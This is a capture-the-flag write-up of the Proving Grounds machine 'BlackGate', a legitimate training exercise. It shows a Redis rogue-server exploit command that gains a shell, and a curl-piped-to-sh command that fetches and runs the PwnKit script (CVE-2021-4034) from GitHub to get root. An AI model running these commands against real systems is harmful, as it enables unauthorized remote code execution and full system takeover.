BlackGate
Source: Proving Grounds OS: Linux Community Rating: Intermediate
Enumeration & Reconnaissance
I started with autorecon which found:
SSH (22)
REDIS (6379)
Not the usual HTTP…
Service Analysis
I opened port 6379 in my web browser and received the message: "-ERR wrong number of arguments for 'get' command"

I kept poking around for a while, then searched for CVEs. I found one that provided RCE by creating a rogue Redis server.
Gaining Initial Access
I got the PoC and ran it a few times before it successfully gave me a shell:
python redis-rogue-server.py --rhost 192.168.192.176 --lhost 192.168.45.201

Privilege Escalation
While I was in, I tried to look for privilege escalation vectors. I started with the basics, running
sudo -l
revealed that /usr/local/bin/redis-status could be run as root without a password. However, couldn't find a known exploit and I couldn’t run it since it requires an Authorization Key.

I then checked other things like cron tabs, kernel exploits, SUIDs, etc., but nothing worked.
There were multiple articles about a way to exploit redis by adding ssh keys to the authorized keys directory, I dived through this for a while before I called it off. I then went through the list of CVEs that linpeas showed.

The first one I tried (CVE-2021-3490) didn’t work, but then when I tried CVE-2021-4034 it worked right away. I just had to run:
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
and I got root.

Lessons Learned
Running a rogue server can turn a misconfigured Redis instance into an RCE vector.
Checking multiple CVEs can reveal the path for privilege escalation.
Last updated